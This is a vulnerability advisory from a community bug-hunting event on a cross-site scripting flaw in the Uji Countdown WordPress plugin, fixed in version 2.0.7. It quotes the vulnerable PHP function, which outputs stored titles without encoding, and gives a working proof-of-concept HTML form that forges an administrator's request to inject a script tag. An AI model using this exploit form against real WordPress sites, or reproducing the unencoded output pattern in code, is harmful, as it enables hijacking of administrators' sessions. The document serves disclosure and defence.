A Cross-Site Scripting vulnerability was found in the Uji Countdown WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE-20160724-0029
This issue was successfully tested on Uji Countdown WordPress Plugin version 2.0.6.
This issue is resolved in Uji Countdown version 2.0.7.
The Uji Countdown WordPress Plugin allows users to display a countdown on their post or page. A Cross-Site Scripting vulnerability was found in the Uji Countdown WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf.
The issue exists in the file /classes/class-uji-countdown-admin.php and is caused by the lack of output encoding in the ujic_tabs_values() function.
private function ujic_tabs_values() {
global $wpdb;
$ujictab = '';
$table_name = $wpdb->prefix . "uji_counter";
$ujic_datas = $wpdb->get_results( "SELECT * FROM $table_name ORDER BY `time` DESC" );
if ( !empty( $ujic_datas ) ) {
foreach ( $ujic_datas as $ujic ) {
$ujic_style = !empty( $ujic->style ) ? $ujic->style : 'classic';
$ujic_ico = '<span id="ujic-style-' . $ujic_style . '" class="ujic-types">' . $ujic_style . '</span>';
$ujictab .='<tr>
<td>' . $ujic->time . '</td>
<td>' . $ujic->title . '</td>
<td>' . $ujic_ico . '</td>
<td>
<a href="?page=uji-countdown&tab=tab_ujic_new&edit=' . $ujic->id . '"><i class="dashicons dashicons-welcome-write-blog"></i>Edit</a> | <a href="options-general.php?page=uji-countdown&del=' . $ujic->id . '"><i class="dashicons dashicons-trash"></i> Delete</a>
</td>
</tr>';
}
}
return $ujictab;
}
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
<html>
<body>
<form action="http://<target>/wp-admin/options-general.php?page=uji-countdown&tab=tab_ujic_new&style=classic&save=true" method="POST">
<input type="hidden" name="ujic_style" value="classic" />
<input type="hidden" name="ujic_name" value=""><script>alert(1);</script>" />
<input type="hidden" name="ujic_goof" value="ABeeZee" />
<input type="hidden" name="ujic_pos" value="center" />
<input type="hidden" name="ujic_d" value="true" />
<input type="hidden" name="ujic_h" value="true" />
<input type="hidden" name="ujic_m" value="true" />
<input type="hidden" name="ujic_s" value="true" />
<input type="hidden" name="ujic_txt" value="true" />
<input type="hidden" name="ujic_size" value="32" />
<input type="hidden" name="ujic_col_dw" value="#a61ba6" />
<input type="hidden" name="ujic_col_up" value="#c368c3" />
<input type="hidden" name="ujic_col_txt" value="#ffffff" />
<input type="hidden" name="ujic_col_sw" value="#000000" />
<input type="hidden" name="ujic_col_lab" value="#000000" />
<input type="hidden" name="ujic_lab_sz" value="13" />
<input type="hidden" name="ujic_subscrFrmWidth" value="100" />
<input type="hidden" name="ujic_subscrFrmAboveText" value="Join Our Newsletter" />
<input type="hidden" name="ujic_subscrFrmInputText" value="Enter your email here" />
<input type="hidden" name="ujic_subscrFrmSubmitText" value="Subscribe" />
<input type="hidden" name="ujic_subscrFrmSubmitColor" value="#ab02b2" />
<input type="hidden" name="ujic_subscrFrmThanksMessage" value="Thanks for subscribing" />
<input type="hidden" name="ujic_subscrFrmErrorMessage" value="Invalid email address" />
<input type="hidden" name="submit_ujic" value="Save Style" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>